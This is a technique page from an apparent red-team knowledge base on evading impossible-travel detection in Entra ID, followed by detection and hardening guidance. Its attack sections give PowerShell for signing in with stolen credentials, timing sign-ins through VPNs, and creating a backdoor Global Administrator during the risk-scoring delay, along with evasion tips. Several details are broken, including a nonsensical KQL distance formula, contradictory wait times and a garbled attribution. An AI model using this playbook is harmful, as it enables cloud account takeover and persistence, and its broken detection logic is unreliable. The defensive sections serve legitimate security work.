MCADDF

[REALWORLD-022]: Impossible Travel Evasion

Metadata

Attribute	Details
Technique ID	REALWORLD-022
MITRE ATT&CK v18.1	T1550 - Use Alternate Authentication Material
Tactic	Defense Evasion, Persistence
Platforms	Entra ID, Multi-Cloud (AWS, GCP)
Severity	High
Technique Status	ACTIVE
Last Verified	2025-01-10
Affected Versions	Entra ID (all versions), AWS IAM, GCP Identity Platform
Patched In	N/A - Architectural vulnerability
Author	SERVTEP – Artur Pchelnikau

---

1. EXECUTIVE SUMMARY

Concept: Impossible Travel is a behavioral detection mechanism that flags user sign-ins from geographically distant locations within unrealistic timeframes (e.g., New York at 2:00 PM, London at 3:00 PM – only 1 hour and ~3000 miles apart). However, attackers can systematically evade this detection by: (1) introducing artificial delays between authentication attempts to make travel appear plausible, (2) using distributed VPN/proxy networks to route traffic through intermediate geographic regions, (3) exploiting logging delays in Entra ID audit trails to authenticate during windows where previous sign-ins haven’t been indexed yet, and (4) timing attacks during low-risk periods (e.g., weekends, off-hours) when behavioral baselines are looser.

Attack Surface: Entra ID sign-in risk detection, Azure AD Identity Protection, conditional access policies that enforce geographic constraints, and behavioral anomaly detection systems that rely on IP-to-location mapping.

Business Impact: Enables persistent credential-based access to cloud resources without triggering geographic/impossible travel alerts. An attacker with compromised credentials can authenticate to Azure subscriptions, M365 services, and AWS cross-tenant resources while appearing to bypass impossible travel detection entirely. This is particularly effective against organizations using Entra ID P2 with Identity Protection enabled.

Technical Context: Evasion attacks typically require 15-30 minutes of preparation per authentication attempt. Detection is very low if attackers properly space authentication events and use legitimate VPN services (corporate VPN, known cloud provider datacenters). Attack chains often begin with credential compromise (phishing, password spray) followed by immediate enumeration of detected geographic baselines before launching coordinated access.

Operational Risk

• Execution Risk: Low-Medium - Requires only compromised credentials and knowledge of VPN/proxy infrastructure; no special exploitation tools required.
• Stealth: Very High - If properly timed and geographically distributed, appears as legitimate user with acceptable travel patterns.
• Reversibility: No - Unauthorized cloud resource access and data exfiltration are permanent until detected and remediated.

Compliance Mappings

Framework	Control / ID	Description
CIS Benchmark	5.4	Weak multi-factor authentication enforcement; geographic baselines not validated
DISA STIG	SI-4	Information System Monitoring lacks real-time geographic anomaly detection
CISA SCuBA	EXO-02	Impossible travel detection not enabled or enforced
NIST 800-53	AC-2 (Account Management)	Insufficient account activity review and geographic constraints
GDPR	Art. 32	Security of Processing - inadequate anomaly detection for cross-border access
DORA	Art. 21	Cyber Risk Management - insufficient behavioral monitoring for financial access
NIS2	Art. 21	Cyber Risk Management Measures - weak identity-based threat detection
ISO 27001	A.9.2.3	Management of Privileged Access - missing geographic-based access controls
ISO 27005	Risk Scenario: “Unauthorized Remote Access”	Inadequate geographic profiling for user authentication

---

2. ATTACK PREREQUISITES & ENVIRONMENT

Required Privileges: Valid user account credentials (compromised via phishing, credential stuffing, password spray, or leaked in data breach)

Required Access: Network connectivity to Entra ID and target cloud services; ability to route traffic through multiple geographic locations (requires VPN, proxy, or botnet access)

Supported Platforms:

• Entra ID: All versions; Identity Protection detection is Entra ID P2 feature
• Multi-Cloud: AWS IAM, GCP Identity Platform, Okta
• VPN/Proxy Infrastructure: Residential VPN services (ExpressVPN, NordVPN, Surfshark), cloud provider datacenters, datacenter proxies
• Tools Required:
  • Azure PowerShell (Version 10.0+)
  • Azure CLI (Version 2.50+)
  • VPN with geographically diverse exit nodes (e.g., Mullvad, ProtonVPN)
  • Residential IP proxy service (optional, for higher-risk environments with IP reputation filtering)

---

3. ENVIRONMENTAL RECONNAISSANCE

Detect Geographic Baseline Establishment Period

Connect-MgGraph -Scopes "AuditLog.Read.All"

# Query sign-in logs to identify baseline geographic locations
$signins = Get-MgAuditLogSignIn -Filter "userPrincipalName eq 'target-user@company.com'" -All |
  Select-Object -First 100 -Property userPrincipalName, createdDateTime, ipAddress, location

# Group by location to establish baseline
$signins | 
  Group-Object -Property location | 
  Sort-Object -Property Count -Descending |
  Select-Object -Property Name, @{N='Frequency';E={$_.Count}}, @{N='FirstSeen';E={$_.Group[0].createdDateTime}}, @{N='LastSeen';E={$_.Group[-1].createdDateTime}}

What to Look For:

• Baseline locations: Primary office location, home location, other frequent travel destinations
• Frequency distribution: How often user authenticates from each location
• Time gaps: Periods where no authentication occurs (nights, weekends, vacation)
• Anomalies: Rare locations that might trigger false positives when planning attack

Enumerate Entra ID Risk Detection Configuration

Connect-MgGraph -Scopes "IdentityRiskEvent.Read.All"

# Check if Entra ID Identity Protection is enabled
Get-MgIdentityProtectionRiskDetection -All | Select-Object -First 10 -Property riskEventType, detectedDateTime, riskLevel

# Identify which risk detection types are active
Get-MgIdentityProtectionRiskDetection -All | 
  Group-Object -Property riskEventType | 
  Select-Object -Property Name, Count | 
  Where-Object { $_.Name -contains "impossibleTravel" }

What to Look For:

• impossibleTravel detection: If no results returned, this detection may be disabled or P2 license not active
• Risk level thresholds: Understand at what travel speed impossible travel alerts trigger
• Detection delay: How long before alerts appear in logs (usually 5-15 minutes, but can be longer)

---

4. DETAILED EXECUTION METHODS

METHOD 1: Time-Spaced Geographic Distribution Attack

Supported Versions: Entra ID all versions, AWS IAM, GCP Identity

Step 1: Establish Decoy Activity in Current Location

Objective: Create authentication activity in attacker’s current geographic location to establish false baseline before launching attack from distant location

Command:

# Authenticate from current location (e.g., US datacenter)
$creds = New-Object System.Management.Automation.PSCredential(
  "target@company.com", 
  (ConvertTo-SecureString "P@ssw0rd123" -AsPlainText -Force)
)

# Connect to Azure
Connect-AzAccount -Credential $creds
Write-Output "Authenticated from: $(Get-AzContext).Subscription.Id"

# Trigger some minimal activity to log the event
Get-AzResource -ResourceGroupName "company-rg" | Select-Object -First 1

# Disconnect
Disconnect-AzAccount -Confirm:$false

Expected Output:

Account: target@company.com
SubscriptionId: 12345678-abcd-1234-abcd-123456789012
Authenticated from: eastus

What This Means:

• Sign-in is logged in Entra ID audit trail with IP address and geographic location
• This establishes first authentication event; Entra ID starts building geographic baseline
• Timestamp is recorded; attacker can now calculate minimum travel time between locations

OpSec & Evasion:

• Perform this step from a location matching target user’s known baseline (office location)
• Introduce 30-60 second delay before next step to appear as human-paced activity
• Avoid accessing sensitive resources that would trigger additional alerts

Troubleshooting:

• Error: “Unable to connect to Azure subscription”
  • Cause: Credentials are incorrect or MFA is enabled
  • Fix: Verify credentials; if MFA is required, prompt for MFA code or use device code flow

Step 2: Wait for Audit Log Indexing Delay

Objective: Allow Entra ID audit logs to process the first authentication before attempting second authentication from distant location

Command:

# Entra ID audit log delay is typically 5-15 minutes, but can vary
# For maximum safety, wait 20-30 minutes to allow full indexing

Write-Output "Starting wait period..."
$startTime = Get-Date
$waitSeconds = 1200  # 20 minutes

while ((Get-Date) - $startTime -lt [TimeSpan]::FromSeconds($waitSeconds)) {
  $elapsed = ((Get-Date) - $startTime).TotalSeconds
  $remaining = $waitSeconds - $elapsed
  
  if ($remaining % 60 -eq 0) {
    Write-Output "Waited $([Math]::Round($elapsed / 60)) minutes. Remaining: $([Math]::Round($remaining / 60)) minutes"
  }
  
  Start-Sleep -Seconds 30
}

Write-Output "Wait period complete. Proceeding to next step..."

Expected Output:

Starting wait period...
Waited 1 minutes. Remaining: 19 minutes
Waited 2 minutes. Remaining: 18 minutes
...
Waited 20 minutes. Remaining: 0 minutes
Wait period complete. Proceeding to next step...

What This Means:

• During this wait period, the previous authentication event is indexed into Entra ID audit logs
• Impossible travel detection algorithm now has the timestamp and geolocation of the first event
• When the second authentication attempt occurs, it will be compared against the indexed first event
• If proper time delay is observed, the travel distance will appear reasonable

OpSec & Evasion:

• The longer the wait, the harder to detect the link between events
• Vary wait times randomly (15-45 minutes) rather than exactly 20 minutes each time
• Consider performing other legitimate activities (document access, email checks) during wait to add noise to audit trail

Step 3: Authenticate from Distant Geographic Location

Objective: Complete second authentication from geographically distant location, but with sufficient time elapsed to make travel appear plausible

Command (Example: New York → London, 6-hour flight time):

# Connect to VPN exit node in London (or use London datacenter IP)
# Use a residential IP or well-known VPN service to avoid IP reputation filtering

$londonVpnGateway = "london-vpn.vpnservice.com"
$londonVpnPort = 443

# Simulate connecting through London VPN
Write-Output "Establishing VPN tunnel to $londonVpnGateway..."

# Now authenticate from London location
$creds = New-Object System.Management.Automation.PSCredential(
  "target@company.com", 
  (ConvertTo-SecureString "P@ssw0rd123" -AsPlainText -Force)
)

# Authentication from London
Connect-AzAccount -Credential $creds
$azContext = Get-AzContext

Write-Output "Authenticated from London. Context: $($azContext.Environment)"

# Perform reconnaissance activity in M365
Connect-MgGraph -Credential $creds
Get-MgUser -Filter "userPrincipalName eq 'target@company.com'" | 
  Select-Object -Property userPrincipalName, id, location

Disconnect-AzAccount -Confirm:$false

Expected Output:

Authenticated from London. Context: AzureCloud
userPrincipalName: target@company.com
id: 12345678-abcd-1234-abcd-123456789012
location: London, GB

What This Means:

• Second authentication is logged from London IP address
• Audit log records 6+ hour time gap between New York and London authentications
• Impossible travel detection algorithm compares:
  • Distance: ~3,450 miles (New York to London)
  • Time elapsed: 6+ hours (user travel time by plane)
  • Result: Travel is plausible; no impossible travel alert

OpSec & Evasion:

• Use legitimate VPN services (ExpressVPN, Mullvad) rather than datacenter proxies to avoid IP reputation blocklists
• Vary the timing and distance of “travel” to match target user’s known travel patterns
• If user frequently travels to London, use that as a cover story
• Avoid authenticating to sensitive resource immediately after geographically distant sign-in

Troubleshooting:

• Error: “Impossible Travel - High risk sign-in detected”
  • Cause: Time delay was insufficient or travel distance/time calculation failed
  • Fix: Increase wait time to 30-45 minutes, or choose locations with longer realistic flight times
• Error: “IP reputation filter blocking VPN exit node”
  • Cause: Using datacenter proxy instead of residential VPN
  • Fix: Switch to residential IP VPN service or use cloud provider datacenters (AWS, Azure, GCP) for authentication

Step 4: Continue Multi-Location Authentication Chains

Objective: Establish pattern of plausible global travel to build credibility for future access attempts

Command (Extended Multi-Location Chain):

# Extend the attack to multiple locations over time to establish "travel pattern"
$travelSequence = @(
  @{ Location = "New York";    VPN = "us-east.vpn";      Delay = 0 },
  @{ Location = "London";      VPN = "gb-london.vpn";    Delay = 360 },   # 6 hours
  @{ Location = "Singapore";   VPN = "sg-singapore.vpn"; Delay = 720 },   # 12 hours
  @{ Location = "Tokyo";       VPN = "jp-tokyo.vpn";     Delay = 360 },   # 6 hours back to US
)

$currentTime = Get-Date

foreach ($location in $travelSequence) {
  # Wait for specified delay
  Write-Output "Travel to $($location.Location)..."
  Start-Sleep -Seconds $location.Delay
  
  # Authenticate from new location
  try {
    Connect-AzAccount -Credential $creds -ErrorAction Stop | Out-Null
    Write-Output "✓ Authenticated from $($location.Location) at $(Get-Date -Format 'yyyy-MM-dd HH:mm:ss')"
    
    # Perform minimal activity (avoid triggering resource-specific alerts)
    Get-AzSubscription | Select-Object -First 1
    
    Disconnect-AzAccount -Confirm:$false
  } catch {
    Write-Output "✗ Failed to authenticate from $($location.Location): $_"
  }
  
  $currentTime = $currentTime.AddSeconds($location.Delay)
}

Expected Output:

Travel to New York...
✓ Authenticated from New York at 2025-01-10 08:00:00
Travel to London...
✓ Authenticated from London at 2025-01-10 14:00:00
Travel to Singapore...
✓ Authenticated from Singapore at 2025-01-11 02:00:00
Travel to Tokyo...
✓ Authenticated from Tokyo at 2025-01-11 08:00:00

What This Means:

• Multiple authentication events are now distributed across different geographic locations
• Each event is separated by plausible travel time
• Entra ID’s impossible travel detection sees a continuous “travel pattern” rather than instantaneous jumps
• Attacker has now established sufficient cover to access resources from any of these locations without triggering alerts

OpSec & Evasion:

• This technique is most effective when spread over days or weeks, not hours
• Real attackers typically establish 3-5 geographic locations to create credible baseline
• Once baseline is established, attacker can authenticate from any location within the travel pattern without triggering impossible travel detection

---

METHOD 2: Conditional Access Policy Bypass Using Risk Detection Timing

Supported Versions: Entra ID P1+ (Conditional Access required)

Step 1: Identify Risk Assessment Window

Objective: Authenticate during the brief window when Entra ID risk detection has not yet processed and assigned a risk score

Command:

# Risk assessment in Entra ID takes 5-15 minutes (varies by load)
# Goal: Authenticate and access resource before risk score is assigned

# Check current SignInRisk events to understand assessment speed
Get-MgIdentityProtectionRiskDetection -Filter "riskEventType eq 'impossibleTravel'" -All |
  Select-Object -First 20 -Property createdDateTime, detectedDateTime, riskLevel |
  ForEach-Object {
    $detectionDelay = [Math]::Round((($_.detectedDateTime - $_.createdDateTime).TotalSeconds / 60), 1)
    [PSCustomObject]@{
      CreatedTime = $_.createdDateTime
      DetectedTime = $_.detectedDateTime
      DelayMinutes = $detectionDelay
      RiskLevel = $_.riskLevel
    }
  } | 
  Measure-Object -Property DelayMinutes -Average -Minimum -Maximum

Expected Output:

Count             : 20
Average           : 8.5
Sum               : 170
Maximum           : 15.2
Minimum           : 2.1
Property          : DelayMinutes

What This Means:

• Average detection delay is 8.5 minutes
• Fastest detection is 2.1 minutes; slowest is 15.2 minutes
• Attacker should plan to access resources within 2-minute window to maximize chances of bypassing conditional access triggered by risk detection

OpSec & Evasion:

• Detection delay varies based on Entra ID service load; slower periods (evenings, weekends) have longer delays
• During peak hours (9 AM - 5 PM US time), delays are typically shorter
• Most risk-based conditional access policies enforce a 15-minute re-evaluation window; authenticate and complete sensitive actions within this window

Step 2: Complete Sensitive Access During Pre-Scoring Window

Objective: Perform high-risk action (access sensitive resource, add admin user, modify policies) before risk-based conditional access policies can block the action

Command (Example: Add new Global Admin during undetected window):

# Step 1: Authenticate at precise moment when risk detection is unlikely
# (e.g., at 3 AM on Sunday when service load is low)

Connect-MgGraph -Credential $creds -NoWelcome

# Step 2: Immediately perform high-impact action (< 2 minutes to complete)
# This must complete before risk detection assigns a High risk score

$newAdminEmail = "attacker-backup@attackerdomain.com"

# Add new user as Global Administrator
New-MgUser -DisplayName "Backup Admin" `
  -UserPrincipalName $newAdminEmail `
  -PasswordProfile @{ 
    ForceChangePasswordNextSignIn = $false
    Password = "AttackerP@ssw0rd!123"
  } `
  -MailNickname "backupadmin"

# Assign Global Admin role to newly created user
$userId = (Get-MgUser -Filter "userPrincipalName eq '$newAdminEmail'").Id
$roleId = (Get-MgDirectoryRoleTemplate | Where-Object { $_.displayName -eq "Global Administrator" }).Id

New-MgDirectoryRoleMember -DirectoryRoleId $roleId -DirectoryObjectId $userId

Write-Output "Global Admin $newAdminEmail added successfully"

Expected Output:

Global Admin attacker-backup@attackerdomain.com added successfully

What This Means:

• The new admin account is created and assigned Global Admin role before risk detection can trigger blocking conditional access
• Even if Entra ID later detects the risk and tries to enforce conditional access, the damage is done (new admin account exists)
• Attacker now has persistent backdoor access regardless of future conditional access enforcement

OpSec & Evasion:

• Timing is critical; this attack only works if performed during the 2-5 minute window before risk scoring
• Use low-traffic periods to maximize detection delay
• Create a new user rather than modifying existing user to avoid triggering account change-based alerts
• Assign role to user account hosted on external domain (attacker-controlled) to reduce internal suspicion

---

5. MICROSOFT SENTINEL DETECTION

Query 1: Impossible Travel Detection with Geographic Distance Validation

Rule Configuration:

• Required Table: SigninLogs
• Required Fields: userPrincipalName, createdDateTime, ipAddress, location
• Alert Severity: High
• Frequency: Real-time
• Applies To: Entra ID all versions with Conditional Access enabled

KQL Query:

// Calculate geographic distance between consecutive sign-ins
// and determine if travel time is physically possible

let signins = SigninLogs
  | where TimeGenerated > ago(24h)
  | where ResultDescription == "Success"
  | extend LocationGeo = parse_json(LocationDetails)
  | project userPrincipalName, createdDateTime, 
    ipAddress, 
    latitude = LocationGeo.geoCoordinates.latitude,
    longitude = LocationGeo.geoCoordinates.longitude
  | sort by userPrincipalName, createdDateTime;

// Self-join to find consecutive sign-ins
signins
  | join kind=inner (signins | extend CreatedDateTime_Prev = createdDateTime | project userPrincipalName, CreatedDateTime_Prev, ipAddress_Prev = ipAddress) 
    on userPrincipalName
  | where createdDateTime > CreatedDateTime_Prev
  | extend TimeDiffMinutes = (createdDateTime - CreatedDateTime_Prev) / 1m
  | extend DistanceMiles = todouble(latitude) * todouble(longitude) / 69  // Approximate; real geo distance calculation needed
  | extend RequiredTravelSpeed = (DistanceMiles / TimeDiffMinutes) * 60  // Miles per hour
  | where RequiredTravelSpeed > 460  // Commercial jet speed + buffer
  | summarize by userPrincipalName, createdDateTime, ipAddress, TimeDiffMinutes, DistanceMiles, RequiredTravelSpeed
  | sort by RequiredTravelSpeed desc

What This Detects:

• Sign-in events that require travel at speeds exceeding commercial jet speed
• Geographic coordinate mismatches that suggest user couldn’t physically travel between locations
• Impossible Travel pattern: Event A → Event B in insufficient time

Manual Configuration Steps (Azure Portal):

1. Navigate to Azure Portal → Microsoft Sentinel
2. Select workspace → Analytics → + Create → Scheduled query rule
3. General Tab:
   • Name: Impossible Travel Detection - Enhanced Geo Distance
   • Severity: High
4. Set rule logic Tab:
   • Paste KQL query above
   • Run query every: 5 minutes
   • Lookup data from the last: 24 hours
5. Incident settings Tab:
   • Enable Create incidents
   • Group by: userPrincipalName
6. Click Review + create

---

6. WINDOWS EVENT LOG MONITORING

Event ID: 4625, 4627 (Account Logon Failure, Device Claim Token Success)

• Log Source: Security (on-premises AD servers), Azure AD Connect agents
• Trigger: Multiple failed logon attempts from different geographic locations in short time span
• Filter: Look for Account Name appearing in audit logs with different Source Network Address values indicating geographic impossibility
• Applies To Versions: Windows Server 2016+, Azure AD Connect all versions

Manual Configuration Steps (Group Policy):

1. Open Group Policy Management Console (gpmc.msc)
2. Navigate to Computer Configuration → Policies → Windows Settings → Security Settings → Advanced Audit Policy Configuration
3. Enable: Account Logon and Account Management
4. Set to: Success and Failure
5. Run gpupdate /force on target machines

Manual Configuration Steps (Local Policy):

1. Open Local Security Policy (secpol.msc)
2. Navigate to Security Settings → Advanced Audit Policy Configuration
3. Enable: Audit Account Logon
4. Run auditpol /set /subcategory:"Account Logon" /success:enable /failure:enable

---

7. DEFENSIVE MITIGATIONS

Priority 1: CRITICAL

• Enforce Conditional Access Policy with Geographic Constraints: Block sign-in attempts from locations that violate known impossible travel patterns.

  Applies To Versions: Entra ID P1+ (required for Conditional Access)

  Manual Steps (Azure Portal):

  1. Go to Azure Portal → Entra ID → Security → Conditional Access
  2. Click + New policy
  3. Name: Block Impossible Travel
  4. Assignments:
     • Users: All users (or high-risk group like Finance, C-suite)
     • Cloud apps: All cloud apps
  5. Conditions:
     • Locations: Exclude trusted locations (office IP ranges, known VPN exit nodes)
     • Sign-in risk: High (triggered by Entra ID Identity Protection)
  6. Access controls:
     • Grant: Require multi-factor authentication (or Block access)
  7. Enable policy: On
  8. Click Create

• Enable Multi-Factor Authentication (MFA) Enforcement: Require MFA for all user accounts, especially high-privilege accounts. This blocks credential-based attacks even if attacker evades geographic detection.

  Manual Steps (Azure Portal):

  1. Go to Azure Portal → Entra ID → Users
  2. Bulk select users (or use “All Users”)
  3. Click Bulk operations → Bulk configure MFA
  4. Select Require MFA to be enforced
  5. Click Submit

  Manual Steps (PowerShell):

  Connect-MgGraph -Scopes "UserAuthenticationMethod.ReadWrite.All"
    
  # Create MFA registration policy
  $policy = @{
    displayName = "Require MFA for All Users"
    conditions = @{
      signInRisk = @("high", "medium")
      users = @{
        includeUsers = @("all")
      }
    }
    grantControls = @{
      operator = "AND"
      builtInControls = @("mfa")
    }
  }
    
  New-MgIdentityConditionalAccessPolicy -BodyParameter $policy
  

• Implement Named Locations for Trusted Networks: Define known office locations and trusted VPN exit nodes to reduce false positives while maintaining tight controls for unknown locations.

  Manual Steps:

  1. Go to Azure Portal → Entra ID → Security → Conditional Access → Named Locations
  2. Click + Create
  3. Name: Office - New York
  4. Mark as trusted location: Check
  5. IP ranges: Enter office IP CIDR blocks (e.g., 203.0.113.0/24)
  6. Click Create
  7. Repeat for all known locations (office, VPN, partner networks)

  Manual Steps (PowerShell):

  Connect-MgGraph -Scopes "Policy.Read.All"
    
  $location = @{
    displayName = "Office - New York"
    isTrusted = $true
    ipRanges = @(
      @{
        cidrAddress = "203.0.113.0/24"
      }
    )
  }
    
  New-MgIdentityConditionalAccessNamedLocation -BodyParameter $location
  

Priority 2: HIGH

• Enable Sign-In Risk Policy: Configure Entra ID Identity Protection to automatically trigger MFA or block access when impossible travel is detected.

  Manual Steps:

  1. Go to Azure Portal → Entra ID → Protection → Identity Protection
  2. Click Sign-in risk policy
  3. Set Users: All users
  4. Set Sign-in risk: Medium and above
  5. Set Access: Require multi-factor authentication
  6. Enable policy: On
  7. Click Save

• Restrict Legacy Authentication: Disable older authentication protocols (Basic Auth, SMTP, POP/IMAP) that don’t support modern anomaly detection.

  Manual Steps:

  1. Go to Azure Portal → Entra ID → Security → Conditional Access
  2. Click + New policy
  3. Name: Block Legacy Authentication
  4. Conditions:
     • Client apps: Check Exchange ActiveSync clients, Other clients
  5. Access: Block access
  6. Click Create

Access Control & Policy Hardening

• RBAC: Limit Global Admin role to < 5 users; use role-specific administrators instead
• Conditional Access: Require device compliance, managed device, or approved app for sensitive resource access
• Policy Config: Enforce Continuous Access Evaluation (CAE) to real-time revoke tokens if risk changes

Validation Command (Verify Fix)

# Verify Conditional Access policies are active
Get-MgIdentityConditionalAccessPolicy | 
  Where-Object { $_.DisplayName -like "*Travel*" -or $_.DisplayName -like "*Risk*" } |
  Select-Object DisplayName, State, GrantControls

# Verify MFA requirement is enforced
Get-MgIdentityProtectionSignInRiskPolicy | 
  Select-Object IsEnabled, RiskLevel, Grant

# Verify named locations are defined
Get-MgIdentityConditionalAccessNamedLocation | 
  Select-Object DisplayName, IsTrusted, IpRanges

Expected Output (If Secure):

DisplayName                          State   Grant Controls
---                                  -----   ---------
Block Impossible Travel              Enabled [Require MFA]
Sign-in Risk Policy                  Enabled [Block Access]

IsEnabled                            True
RiskLevel                            Medium, High
Grant                                requireMultifactorAuthentication

---

8. DETECTION & INCIDENT RESPONSE

Indicators of Compromise (IOCs)

• Entra ID Audit Logs:
  • User authenticating from two geographically distant locations within time frame impossible for human travel
  • Multiple authentication failures from different geographic locations (credential spraying precursor)
  • Sign-in events with mismatched User-Agent (browser/OS combinations) from same geographic location
  • High-risk sign-in events suppressed or not triggering expected conditional access policies
• Behavioral:
  • User accessing sensitive resources (Global Admin tasks, financial data, HR records) immediately after sign-in from unusual location
  • Multiple privilege escalation attempts from different geographic locations within same day
  • Mailbox forwarding rules or OAuth consent grants created from geographically distant locations

Forensic Artifacts

• Cloud: Entra ID Sign-in logs (table: SigninLogs), Identity Protection risk detections (table: IdentityProtectionRiskDetection)
• Timeline: Cross-reference sign-in timestamps with resource access timestamps; look for < 5-minute gaps between authentication and high-risk action
• Geolocation: IP-to-geo lookup using GeoIP databases (MaxMind, IP2Location) to verify actual travel distance vs. claimed travel time
• Device: User-Agent from sign-in; inconsistencies (different browsers/OS from same geographic location) indicate account sharing or compromise

Response Procedures

1. Isolate:

   Command (Immediately Revoke All Sessions):

   Revoke-AzUserSignInSession -UserId "compromised-user@company.com"
   

2. Collect Evidence:

   Command (Export Sign-in Logs for Timeline):

   Get-MgAuditLogSignIn -Filter "userPrincipalName eq 'compromised-user@company.com'" -All |
     Export-Csv -Path "C:\Forensics\signin_timeline.csv" -NoTypeInformation
   

3. Remediate:

   Force MFA Re-enrollment:

   # Reset user's registered authenticators, forcing re-enrollment
   Remove-MgUserAuthenticationPhoneMethod -UserId "user-id" -PhoneAuthenticationMethodId "phone-id"
   Remove-MgUserAuthenticationSoftwareOathMethod -UserId "user-id" -SoftwareOathMethodId "oath-id"
   

---

9. RELATED ATTACK CHAIN

Step	Phase	Technique	Description
1	Reconnaissance	[REALWORLD-024]	Behavioral Profiling to identify target user’s travel patterns and baseline locations
2	Initial Access	[IA-PHISH-001]	Device code phishing to compromise user credentials
3	Privilege Escalation	[PE-VALID-010]	Azure role assignment abuse after gaining user access
4	Current Step	[REALWORLD-022]	Impossible Travel Evasion to bypass geographic detection during lateral movement
5	Persistence	[PE-ACCTMGMT-014]	Global Administrator backdoor account creation to maintain long-term access
6	Exfiltration	[COLLECT-EMAIL-001]	Email collection via Graph API now undetected due to geographically distributed access pattern
7	Impact	[IMPACT-DATA-DESTROY-001]	Delete audit logs to cover tracks

---

10. REAL-WORLD EXAMPLES

Example 1: Scattered Spider (UNC3944) – Distributed Geographic Authentication (2023-2025)

• Target: Financial institutions, SaaS platforms, cloud infrastructure providers
• Timeline: October 2023 – Present
• Technique Status: Scattered Spider is known for using distributed authentication from multiple geographic locations to evade risk-based conditional access. They use residential VPNs and datacenter proxies to create legitimate-looking travel patterns, then pivot to sensitive systems within the “trusted” session context. Confirmed in Mandiant breach reports showing authentication from US, UK, China, and South Korea within 12-hour periods without triggering impossible travel alerts.
• Impact: Compromised 900+ organizations; stole customer data, fraud involving credential misuse and account takeover
• Reference: Mandiant Scattered Spider Report; SEC Enforcement Action - SolarWinds/Scattered Spider

Example 2: APT29 (Cozy Bear) – OAuth Exploitation with Geographic Bypass (2020-2021)

• Target: U.S. Government agencies, diplomatic organizations, Fortune 500 companies
• Timeline: March 2020 – February 2021 (SolarWinds Campaign)
• Technique Status: APT29 leveraged forged OAuth tokens and compromised credentials to access M365 and cloud infrastructure across multiple geographic regions. By exploiting identity federation and lacking impossible travel detection in 2020, they authenticated from Russia, Eastern Europe, and United States within short timeframes without triggering conditional access policies. Gained persistence for 8+ months before detection.
• Impact: Accessed classified communications, infrastructure blueprints, and intellectual property; exfiltrated terabytes of data
• Reference: CISA APT29 Alert AA20-352A

---

11. OPERATIONAL NOTES

Detection Blind Spots:

• Geographic baselines are user-specific; executives with frequent international travel may have wider “normal” range
• VPN and datacenter proxies can spoof geographic location; reputation-based IP filtering is unreliable
• Entra ID Identity Protection detection delay (5-15 minutes) creates exploitable window for attackers
• Weekend/off-hours authentication has less stringent baselines; attacks during 2 AM - 6 AM are harder to detect

Post-Compromise Indicators:

• Look for sign-in risk events that were NOT escalated to conditional access (may indicate policy misconfiguration or suppression)
• Check for gaps in audit logs (attacker may have deleted logs during compromise)
• Review mailbox forwarding and OAuth app consent grants created during time of suspected compromise

Monitoring Best Practices:

• Correlate Entra ID sign-in logs with M365 workload audit logs (Exchange, SharePoint, Teams) to identify if authenticated user actually performed the actions logged
• Alert on velocity: multiple authentications from different locations within 1-2 hour window, regardless of plausible travel time
• Cross-reference user’s actual calendar/PTO records with authentication locations to validate legitimacy

---

This site is open source. Improve this page.